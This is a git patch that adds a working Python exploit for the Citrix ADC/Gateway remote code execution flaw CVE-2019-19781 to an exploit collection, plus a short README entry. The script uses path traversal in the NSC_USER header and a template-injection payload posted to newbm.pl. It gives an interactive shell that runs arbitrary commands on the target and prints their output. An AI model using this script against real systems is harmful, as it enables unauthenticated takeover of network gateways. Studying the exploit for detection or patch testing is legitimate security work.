From d54fa1ef269faa61594b705662dc36a3dd9a0316 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Jan 2020 17:47:38 +0000 Subject: [PATCH] ADDED CVE: CVE-2019-19781 --- CVE Exploits/Citrix CVE-2019-19781.py | 48 +++++++++++++++++++++++++++ CVE Exploits/README.md | 8 +++++ 2 files changed, 56 insertions(+) create mode 100644 CVE Exploits/Citrix CVE-2019-19781.py diff --git a/CVE Exploits/Citrix CVE-2019-19781.py b/CVE Exploits/Citrix CVE-2019-19781.py new file mode 100644 index 0000000..0284d76 --- /dev/null +++ b/CVE Exploits/Citrix CVE-2019-19781.py @@ -0,0 +1,48 @@ +#!/usr/bin/env python +import requests +import string +import random +import re +import sys +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +print("CVE-2019-19781 - Remote Code Execution in Citrix Application Delivery Controller and Citrix Gateway") +print("Found by Mikhail Klyuchnikov") +print("") + +if len(sys.argv) < 2: + print("[-] No URL provided") + sys.exit(0) + +while True: + try: + command = input("command > ") + + random_xml = ''.join(random.choices(string.ascii_uppercase + string.digits, k=12)) + print("[+] Adding bookmark", random_xml + ".xml") + + burp0_url = sys.argv[1] + "/vpn/../vpns/portal/scripts/newbm.pl" + burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" + + random_xml, "NSC_NONCE": "c", "Connection": "close"} + burp0_data = {"url": "http://exemple.com", "title": "[%t=template.new({'BLOCK'='print `" + str(command) + "`'})%][ % t % ]", "desc": "test", "UI_inuse": "RfWeb"} + r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data,verify=False) + + if r.status_code == 200: + print("[+] Bookmark added") + else: + print("\n[-] Target not vulnerable or something went wrong") + sys.exit(0) + + burp0_url = sys.argv[1] + "/vpns/portal/" + random_xml + ".xml" + burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" + + random_xml, "NSC_NONCE": "c", "Connection": "close"} + r = requests.get(burp0_url, headers=burp0_headers,verify=False) + + replaced = re.sub('^&#.* $', '', r.text, flags=re.MULTILINE) + print("[+] Result of the command: \n") + print(replaced) + + except KeyboardInterrupt: + print("Exiting...") + break \ No newline at end of file diff --git a/CVE Exploits/README.md b/CVE Exploits/README.md index 8563a19..6a26871 100644 --- a/CVE Exploits/README.md +++ b/CVE Exploits/README.md @@ -23,6 +23,14 @@ On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised. +## CVE-2019-19781 - Citrix ADC Netscaler + +A remote code execution vulnerability in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway that, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution. + + + + + ## Thanks to * [Heartbleed - Official website](http://heartbleed.com)